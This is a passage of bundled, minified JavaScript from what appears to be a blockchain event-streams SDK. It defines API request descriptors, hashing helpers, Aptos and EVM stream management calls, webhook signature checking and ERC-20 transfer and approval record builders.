    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$5,
    getRequestBody: $be177b42cca18859$var$getRequestBody$1,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$5,
    serializeRequest: $be177b42cca18859$var$serializeRequest$5,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$5
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$5(request) {
    return {
        streamId: request.streamId,
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$1() {
    return {};
}
function $be177b42cca18859$var$deserializeResponse$5(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$5(request) {
    return {
        streamId: request.streamId,
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeRequest$5(jsonRequest) {
    return {
        streamId: jsonRequest.streamId,
        id: jsonRequest.id
    };
}
var $be177b42cca18859$export$8e5852afff92447b = {
    method: "GET",
    name: "getLogs",
    id: "GetLogs",
    groupName: "history",
    urlPathPattern: "/history/logs",
    urlSearchParamNames: [
        "limit",
        "cursor"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$4,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$4,
    serializeRequest: $be177b42cca18859$var$serializeRequest$4,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$4
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$4(request) {
    return {
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$4(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(result) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, result), {
            chain: (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(result.chain)
        });
    });
}
function $be177b42cca18859$var$serializeRequest$4(request) {
    return request;
}
function $be177b42cca18859$var$deserializeRequest$4(jsonRequest) {
    return jsonRequest;
}
var $be177b42cca18859$export$74e5854bc75714d3 = {
    method: "GET",
    name: "getSettings",
    id: "GetSettings",
    groupName: "project",
    urlPathPattern: "/settings",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$3,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$3,
    serializeRequest: $be177b42cca18859$var$serializeRequest$3,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$3
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$3() {
    return {};
}
function $be177b42cca18859$var$deserializeResponse$3(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$3() {
    return undefined;
}
function $be177b42cca18859$var$deserializeRequest$3() {
    return {};
}
var $be177b42cca18859$export$ef6a493f85f251b = {
    method: "POST",
    name: "setSettings",
    id: "SetSettings",
    groupName: "project",
    urlPathPattern: "/settings",
    bodyParamNames: [
        "region"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$2,
    getRequestBody: $be177b42cca18859$var$getRequestBody,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$2,
    serializeRequest: $be177b42cca18859$var$serializeRequest$2,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$2
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$2() {
    return {};
}
function $be177b42cca18859$var$getRequestBody(request) {
    return {
        region: request.region
    };
}
function $be177b42cca18859$var$deserializeResponse$2(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$2(request) {
    return {
        region: request.region
    };
}
function $be177b42cca18859$var$deserializeRequest$2(jsonRequest) {
    return {
        region: jsonRequest.region
    };
}
var $be177b42cca18859$export$46d070e9f577efc8 = {
    method: "GET",
    name: "getStats",
    id: "getStats",
    groupName: "streams",
    urlPathPattern: "/stats",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$1,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$1,
    serializeRequest: $be177b42cca18859$var$serializeRequest$1,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$1
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$1() {
    return {};
}
function $be177b42cca18859$var$deserializeResponse$1(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$1() {
    return undefined;
}
function $be177b42cca18859$var$deserializeRequest$1() {
    return {};
}
var $be177b42cca18859$export$4df77fd2c69cb5e7 = {
    method: "GET",
    name: "getStatsById",
    id: "GetStatsByStreamId",
    groupName: "stats",
    urlPathPattern: "/stats/{streamId}",
    urlPathParamNames: [
        "streamId"
    ],
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse,
    serializeRequest: $be177b42cca18859$var$serializeRequest,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams(request) {
    return {
        streamId: request.streamId
    };
}
function $be177b42cca18859$var$deserializeResponse(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest(request) {
    return request;
}
function $be177b42cca18859$var$deserializeRequest(jsonRequest) {
    return jsonRequest;
}


var $5d0551371c89d07b$exports = {};
"use strict";
var $5d0551371c89d07b$var$__createBinding = $5d0551371c89d07b$exports && $5d0551371c89d07b$exports.__createBinding || (Object.create ? function(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    var desc = Object.getOwnPropertyDescriptor(m, k);
    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) desc = {
        enumerable: true,
        get: function() {
            return m[k];
        }
    };
    Object.defineProperty(o, k2, desc);
} : function(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    o[k2] = m[k];
});
var $5d0551371c89d07b$var$__exportStar = $5d0551371c89d07b$exports && $5d0551371c89d07b$exports.__exportStar || function(m, exports1) {
    for(var p in m)if (p !== "default" && !Object.prototype.hasOwnProperty.call(exports1, p)) $5d0551371c89d07b$var$__createBinding(exports1, m, p);
};
Object.defineProperty($5d0551371c89d07b$exports, "__esModule", {
    value: true
});
$5d0551371c89d07b$exports.isHexString = $5d0551371c89d07b$exports.getKeys = $5d0551371c89d07b$exports.fromAscii = $5d0551371c89d07b$exports.fromUtf8 = $5d0551371c89d07b$exports.toAscii = $5d0551371c89d07b$exports.arrayContainsArray = $5d0551371c89d07b$exports.getBinarySize = $5d0551371c89d07b$exports.padToEven = $5d0551371c89d07b$exports.stripHexPrefix = $5d0551371c89d07b$exports.isHexPrefixed = void 0;

/**
 * Constants
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("5jI7y")), $5d0551371c89d07b$exports);

/**
 * Account class and helper functions
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("idiNS")), $5d0551371c89d07b$exports);

/**
 * Address type
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("aSXhg")), $5d0551371c89d07b$exports);

/**
 * Hash functions
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("gKSHR")), $5d0551371c89d07b$exports);

/**
 * ECDSA signature
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("67JT1")), $5d0551371c89d07b$exports);

/**
 * Utilities for manipulating Buffers, byte arrays, etc.
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("b61lJ")), $5d0551371c89d07b$exports);

/**
 * Function for definining properties on an object
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("cLPFP")), $5d0551371c89d07b$exports);

/**
 * External exports (BN, rlp)
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("4jhio")), $5d0551371c89d07b$exports);

/**
 * Helpful TypeScript types
 */ $5d0551371c89d07b$var$__exportStar((parcelRequire("eLj8Y")), $5d0551371c89d07b$exports);

var $aj8Qm = parcelRequire("aj8Qm");
Object.defineProperty($5d0551371c89d07b$exports, "isHexPrefixed", {
    enumerable: true,
    get: function() {
        return $aj8Qm.isHexPrefixed;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "stripHexPrefix", {
    enumerable: true,
    get: function() {
        return $aj8Qm.stripHexPrefix;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "padToEven", {
    enumerable: true,
    get: function() {
        return $aj8Qm.padToEven;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "getBinarySize", {
    enumerable: true,
    get: function() {
        return $aj8Qm.getBinarySize;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "arrayContainsArray", {
    enumerable: true,
    get: function() {
        return $aj8Qm.arrayContainsArray;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "toAscii", {
    enumerable: true,
    get: function() {
        return $aj8Qm.toAscii;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "fromUtf8", {
    enumerable: true,
    get: function() {
        return $aj8Qm.fromUtf8;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "fromAscii", {
    enumerable: true,
    get: function() {
        return $aj8Qm.fromAscii;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "getKeys", {
    enumerable: true,
    get: function() {
        return $aj8Qm.getKeys;
    }
});
Object.defineProperty($5d0551371c89d07b$exports, "isHexString", {
    enumerable: true,
    get: function() {
        return $aj8Qm.isHexString;
    }
});



var $kiSKt = parcelRequire("kiSKt");

var $da90616c06668669$export$d2a8849cfb277c;
(function(SupportedAlgorithm) {
    SupportedAlgorithm["sha256"] = "sha256";
    SupportedAlgorithm["sha512"] = "sha512";
})($da90616c06668669$export$d2a8849cfb277c || ($da90616c06668669$export$d2a8849cfb277c = {}));



const $7c32f9e80a4a2783$export$83d89fbfd8236492 = "sha2/5.7.0";


"use strict";
const $bb82ee6f1acbd7c8$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7c32f9e80a4a2783$export$83d89fbfd8236492));
function $bb82ee6f1acbd7c8$export$d1cea0ee4e3f0d3e(data) {
    return "0x" + (0, (/*@__PURE__*/$parcel$interopDefault($kiSKt))).ripemd160().update((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data)).digest("hex");
}
function $bb82ee6f1acbd7c8$export$bced8d2aada2d1c9(data) {
    return "0x" + (0, (/*@__PURE__*/$parcel$interopDefault($kiSKt))).sha256().update((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data)).digest("hex");
}
function $bb82ee6f1acbd7c8$export$a888d2532e6dc7bb(data) {
    return "0x" + (0, (/*@__PURE__*/$parcel$interopDefault($kiSKt))).sha512().update((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data)).digest("hex");
}
function $bb82ee6f1acbd7c8$export$967075d2f3b8e7ff(algorithm, key, data) {
    if (!(0, $da90616c06668669$export$d2a8849cfb277c)[algorithm]) $bb82ee6f1acbd7c8$var$logger.throwError("unsupported algorithm " + algorithm, (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
        operation: "hmac",
        algorithm: algorithm
    });
    return "0x" + (0, (/*@__PURE__*/$parcel$interopDefault($kiSKt))).hmac((0, (/*@__PURE__*/$parcel$interopDefault($kiSKt)))[algorithm], (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(key)).update((0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(data)).digest("hex");
}






var $6ZWSX = parcelRequire("6ZWSX");
var $e96acc503731d7ac$require$Buffer = $6ZWSX.Buffer;
/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $e96acc503731d7ac$var$extendStatics = function(d, b) {
    $e96acc503731d7ac$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $e96acc503731d7ac$var$extendStatics(d, b);
};
function $e96acc503731d7ac$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $e96acc503731d7ac$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
function $e96acc503731d7ac$var$__rest(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
function $e96acc503731d7ac$var$__spreadArray(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
}
var $e96acc503731d7ac$var$StreamNetwork;
(function(StreamNetwork) {
    StreamNetwork["APTOS"] = "aptos";
    StreamNetwork["EVM"] = "evm";
})($e96acc503731d7ac$var$StreamNetwork || ($e96acc503731d7ac$var$StreamNetwork = {}));
var $e96acc503731d7ac$var$IncorrectNetworkError = /** @class */ function(_super) {
    $e96acc503731d7ac$var$__extends(IncorrectNetworkError, _super);
    function IncorrectNetworkError(network) {
        return _super.call(this, {
            code: (0, $10891f2cb3e98601$export$c7aa09645659b4e0).INCORRECT_NETWORK,
            message: 'Incorrect network provided. Got "'.concat(network, '", Valid values are: ').concat(Object.values($e96acc503731d7ac$var$StreamNetwork).map(function(value) {
                return '"'.concat(value, '"');
            }).join(", "))
        }) || this;
    }
    return IncorrectNetworkError;
}((0, $10891f2cb3e98601$export$b95da19793ffce92));
var $e96acc503731d7ac$var$makeCreateAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$62ca96839ba2394c), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeCreateEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$5f0e8a2a28322ce6), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeCreateStream = function(core, baseUrl) {
    return function(createStreamOptions) {
        switch(createStreamOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeCreateAptosStream(core, baseUrl, createStreamOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeCreateEvmStream(core, baseUrl, createStreamOptions);
            default:
                if (createStreamOptions.networkType === undefined) return $e96acc503731d7ac$var$makeCreateEvmStream(core, baseUrl, createStreamOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(createStreamOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeUpdateAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$618f8c89ae5ef7a2), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeUpdateEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$6bac4b1bf4cd751e), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeUpdateStream = function(core, baseUrl) {
    return function(updateStreamOptions) {
        switch(updateStreamOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeUpdateAptosStream(core, baseUrl, updateStreamOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeUpdateEvmStream(core, baseUrl, updateStreamOptions);
            default:
                if (updateStreamOptions.networkType === undefined) return $e96acc503731d7ac$var$makeUpdateEvmStream(core, baseUrl, updateStreamOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(updateStreamOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeDeleteAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$b85bfcb549e86561), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeDeleteEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$9e20afe667e5a6), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeDeleteStream = function(core, baseUrl) {
    return function(deleteStreamOptions) {
        switch(deleteStreamOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeDeleteAptosStream(core, baseUrl, deleteStreamOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeDeleteEvmStream(core, baseUrl, deleteStreamOptions);
            default:
                if (deleteStreamOptions.networkType === undefined) return $e96acc503731d7ac$var$makeDeleteEvmStream(core, baseUrl, deleteStreamOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(deleteStreamOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeGetAptosStream$1 = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $be177b42cca18859$export$260bbd31693b2860), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetEvmStream$1 = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $be177b42cca18859$export$1142d3d1cbdc0e17), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeGetStreams = function(core, baseUrl) {
    return function(getStreamsOptions) {
        switch(getStreamsOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeGetAptosStream$1(core, baseUrl, getStreamsOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeGetEvmStream$1(core, baseUrl, getStreamsOptions);
            default:
                if (getStreamsOptions.networkType === undefined) return $e96acc503731d7ac$var$makeGetEvmStream$1(core, baseUrl, getStreamsOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(getStreamsOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$SHA3_NULL_S = "0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470";
var $e96acc503731d7ac$var$isHexStrict = function(hex) {
    return /^(-)?0x[0-9a-f]*$/i.test(hex);
};
var $e96acc503731d7ac$var$sha3 = function(value) {
    var bufferValue;
    if ($e96acc503731d7ac$var$isHexStrict(value) && /^0x/i.test(value.toString())) bufferValue = (0, $5d0551371c89d07b$exports.toBuffer)(value);
    else // Assume value is an arbitrary string
    bufferValue = $e96acc503731d7ac$require$Buffer.from(value, "utf-8");
    var returnValue = (0, $5d0551371c89d07b$exports.bufferToHex)((0, $5d0551371c89d07b$exports.keccak256)(bufferValue));
    if (returnValue === $e96acc503731d7ac$var$SHA3_NULL_S) return null;
    return returnValue;
};
var $e96acc503731d7ac$var$StreamsConfig = {
    streamsSecret: {
        name: "streamsSecret",
        defaultValue: null
    }
};
var $e96acc503731d7ac$var$makeVerifySignature = function(config) {
    return function(_a) {
        var body = _a.body, signature = _a.signature;
        var secret = config.get($e96acc503731d7ac$var$StreamsConfig.streamsSecret);
        if (!secret) secret = config.get((0, $bd1f3f52e29d943b$export$91cdabc826465a24).apiKey);
        if (!secret) throw new (0, $10891f2cb3e98601$export$b95da19793ffce92)({
            code: (0, $10891f2cb3e98601$export$c7aa09645659b4e0).GENERIC_STREAM_ERROR,
            message: "Unable to verify signature without an api key or streams secret"
        });
        var generatedSignature = $e96acc503731d7ac$var$sha3(JSON.stringify(body) + secret);
        if (signature !== generatedSignature) throw new (0, $10891f2cb3e98601$export$b95da19793ffce92)({
            code: (0, $10891f2cb3e98601$export$c7aa09645659b4e0).INVALID_SIGNATURE,
            message: "Signature is not valid"
        });
        return true;
    };
};
var $e96acc503731d7ac$var$makeAddAddressAptosStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$35e2a8df834bde5c), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeAddAddressEvmStream = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$b94aefd70722a72c), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeAddAddress = function(core, baseUrl) {
    return function(addAddressOptions) {
        switch(addAddressOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeAddAddressAptosStream(core, baseUrl, addAddressOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeAddAddressEvmStream(core, baseUrl, addAddressOptions);
            default:
                if (addAddressOptions.networkType === undefined) return $e96acc503731d7ac$var$makeAddAddressEvmStream(core, baseUrl, addAddressOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(addAddressOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$makeUpdateAptosStreamStatus = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$44dd858b7429efd9), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeUpdateEvmStreamStatus = function(core, baseUrl, _a) {
    _a.networkType;
    var options = $e96acc503731d7ac$var$__rest(_a, [
        "networkType"
    ]);
    return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $be177b42cca18859$export$3d5c010f80489b1f), baseUrl, core).fetch(options);
};
var $e96acc503731d7ac$var$makeUpdateStreamStatus = function(core, baseUrl) {
    return function(updateStreamOptions) {
        switch(updateStreamOptions.networkType){
            case $e96acc503731d7ac$var$StreamNetwork.APTOS:
                return $e96acc503731d7ac$var$makeUpdateAptosStreamStatus(core, baseUrl, updateStreamOptions);
            case $e96acc503731d7ac$var$StreamNetwork.EVM:
                return $e96acc503731d7ac$var$makeUpdateEvmStreamStatus(core, baseUrl, updateStreamOptions);
            default:
                if (updateStreamOptions.networkType === undefined) return $e96acc503731d7ac$var$makeUpdateEvmStreamStatus(core, baseUrl, updateStreamOptions);
                throw new $e96acc503731d7ac$var$IncorrectNetworkError(updateStreamOptions.networkType);
        }
    };
};
var $e96acc503731d7ac$var$hasAbis = function(webhookData) {
    if (!webhookData.abi || webhookData.abi.length < 1) return false;
    return true;
};
var $e96acc503731d7ac$var$isWebhook = function(webhookData) {
    if (typeof webhookData !== "object" || webhookData === null || !("logs" in webhookData)) return false;
    return true;
};
var $e96acc503731d7ac$export$19147bfdba679cec = /** @class */ function() {
    function CollectionNameBuilder() {
        this.cache = {};
        this.cacheLimit = 256;
    }
    CollectionNameBuilder.prototype.build = function(tag) {
        var result = this.cache[tag];
        if (!result) {
            result = this.process(tag);
            if (this.cacheLimit > 0) {
                // Simple anti DDOS protection.
                this.cache[tag] = result;
                this.cacheLimit--;
            }
        }
        return result;
    };
    CollectionNameBuilder.prototype.process = function(tag) {
        var parts = tag.split(/[^a-zA-Z0-9_]/).filter(function(p) {
            return !!p;
        }).map(function(p) {
            return p.substring(0, 1).toUpperCase() + p.substring(1).toLowerCase();
        });
        if (parts.length < 1) throw new Error('Cannot build table name from value "'.concat(tag, '"'));
        return parts.join("");
    };
    return CollectionNameBuilder;
}();
var $e96acc503731d7ac$var$SimpleProcessor = /** @class */ function() {
    function SimpleProcessor(collectionNameBuilder, documentBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.documentBuilder = documentBuilder;
    }
    SimpleProcessor.prototype.process = function(items, batch) {
        var updates = [];
        if (items) for(var _i = 0, items_1 = items; _i < items_1.length; _i++){
            var item = items_1[_i];
            var document_1 = this.documentBuilder(item, batch.block, batch.confirmed, batch.chainId);
            updates.push({
                collectionName: this.collectionNameBuilder.build(batch.tag),
                document: document_1
            });
        }
        return updates;
    };
    return SimpleProcessor;
}();
var $e96acc503731d7ac$var$Sha256 = /** @class */ function() {
    function Sha256() {}
    Sha256.hash = function(value) {
        var bytes = (0, $b2a54ce293d87a2e$export$8feeb310b4b4752f)(value);
        return (0, $bb82ee6f1acbd7c8$export$bced8d2aada2d1c9)(bytes);
    };
    return Sha256;
}();
var $e96acc503731d7ac$var$LogRelatedId = /** @class */ function() {
    function LogRelatedId() {}
    LogRelatedId.create = function(chainId, transactionHash, logIndex) {
        var safeTransactionHash = transactionHash.toLowerCase();
        return $e96acc503731d7ac$var$Sha256.hash("".concat(chainId, ";").concat(safeTransactionHash, ";").concat(logIndex));
    };
    return LogRelatedId;
}();
var $e96acc503731d7ac$var$TriggerItemsBuilder = /** @class */ function() {
    function TriggerItemsBuilder() {}
    TriggerItemsBuilder.build = function(triggers) {
        if (!triggers || triggers.length === 0) return undefined;
        return triggers.map(function(trigger) {
            return {
                name: String(trigger.name),
                value: $e96acc503731d7ac$var$convertValue(trigger.value)
            };
        });
    };
    return TriggerItemsBuilder;
}();
// eslint-disable-next-line @typescript-eslint/no-explicit-any
function $e96acc503731d7ac$var$convertValue(value) {
    var type = typeof value;
    if (type === "string" || type === "number" || type === "boolean") return value;
    if (Array.isArray(value)) return value.map($e96acc503731d7ac$var$convertValue);
    return String(value);
}
var $e96acc503731d7ac$export$cd06b22a5eda6f4b = /** @class */ function() {
    function Erc20TransferDocumentBuilder() {}
    Erc20TransferDocumentBuilder.build = function(transfer, block, confirmed, chainId) {
        var chain = Number(chainId);
        var document = {
            id: $e96acc503731d7ac$var$LogRelatedId.create(chain, transfer.transactionHash, transfer.logIndex),
            transactionHash: transfer.transactionHash,
            contract: transfer.contract,
            logIndex: transfer.logIndex,
            from: transfer.from,
            to: transfer.to,
            value: transfer.value,
            tokenDecimals: parseInt(transfer.tokenDecimals, 10),
            tokenName: transfer.tokenName,
            tokenSymbol: transfer.tokenSymbol,
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            chainId: chain,
            triggers: $e96acc503731d7ac$var$TriggerItemsBuilder.build(transfer.triggers)
        };
        return document;
    };
    return Erc20TransferDocumentBuilder;
}();
var $e96acc503731d7ac$export$b03f9ca20951ba50 = /** @class */ function() {
    function Erc20TransfersProcessor(collectionNameBuilder) {
        this.collectionNameBuilder = collectionNameBuilder;
        this.simpleProcessor = new $e96acc503731d7ac$var$SimpleProcessor(this.collectionNameBuilder, $e96acc503731d7ac$export$cd06b22a5eda6f4b.build);
    }
    Erc20TransfersProcessor.prototype.process = function(batch) {
        return this.simpleProcessor.process(batch.erc20Transfers, batch);
    };
    return Erc20TransfersProcessor;
}();
var $e96acc503731d7ac$export$cf5d7ac98558aa60 = /** @class */ function() {
    function Erc20ApprovalDocumentBuilder() {}
    Erc20ApprovalDocumentBuilder.build = function(approval, block, confirmed, chainId) {
        var chain = Number(chainId);
        var document = {
            id: $e96acc503731d7ac$var$LogRelatedId.create(chain, approval.transactionHash, approval.logIndex),
            transactionHash: approval.transactionHash,
            contract: approval.contract,
            logIndex: approval.logIndex,
            owner: approval.owner,
            spender: approval.spender,
            value: approval.value,
            tokenDecimals: parseInt(approval.tokenDecimals, 10),
            tokenName: approval.tokenName,
            tokenSymbol: approval.tokenSymbol,
            blockHash: block.hash,
            blockTimestamp: parseInt(block.timestamp, 10),
            blockNumber: parseInt(block.number, 10),
            confirmed: confirmed,
            chainId: chain,
            triggers: $e96acc503731d7ac$var$TriggerItemsBuilder.build(approval.triggers)
        };
        return document;
    };
    return Erc20ApprovalDocumentBuilder;
}();
var $e96acc503731d7ac$export$97151493f4a347e1 = /** @class */ function() {
    function Erc20ApprovalsProcessor(collectionNameBuilder) {
